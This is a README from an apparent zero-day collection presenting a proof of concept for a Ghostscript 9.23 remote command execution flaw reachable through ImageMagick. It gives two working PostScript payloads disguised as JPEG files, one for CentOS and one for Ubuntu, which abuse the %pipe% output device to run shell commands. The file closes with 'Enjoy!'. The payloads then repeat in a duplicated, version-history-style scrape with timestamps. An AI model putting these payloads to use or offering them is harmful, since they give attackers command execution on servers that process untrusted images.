0day/ImageMagick/Ghostscript_9.23/README.md

# ImageMagick Ghostscript RCE

## POC

### Centos 

```
$ cat shellexec.jpeg
%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
```

### Ubuntu

```
$ cat shellexec.jpeg
%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
```

## Enjoy!
ImageMagick Ghostscript RCE 2018-08-23 10:23:20 +08:00			`# ImageMagick Ghostscript RCE`

			`## POC`

			`### Centos`

			```
ImageMagick Ghostscript RCE ImageMagick Ghostscript RCE 2018-08-23 10:25:11 +08:00			`$ cat shellexec.jpeg`
			`%!PS`
			`userdict /setpagedevice undef`
			`legal`
			`{ null restore } stopped { pop } if`
			`legal`
			`mark /OutputFile (%pipe%id) currentdevice putdeviceprops`
ImageMagick Ghostscript RCE 2018-08-23 10:23:20 +08:00			```

			`### Ubuntu`

			```
ImageMagick Ghostscript RCE ImageMagick Ghostscript RCE 2018-08-23 10:25:11 +08:00			`$ cat shellexec.jpeg`
			`%!PS`
			`userdict /setpagedevice undef`
			`save`
			`legal`
			`{ null restore } stopped { pop } if`
			`{ legal } stopped { pop } if`
			`restore`
			`mark /OutputFile (%pipe%id) currentdevice putdeviceprops`
ImageMagick Ghostscript RCE 2018-08-23 10:23:20 +08:00			```
ImageMagick Ghostscript RCE ImageMagick Ghostscript RCE 2018-08-23 10:25:11 +08:00
			`## Enjoy!`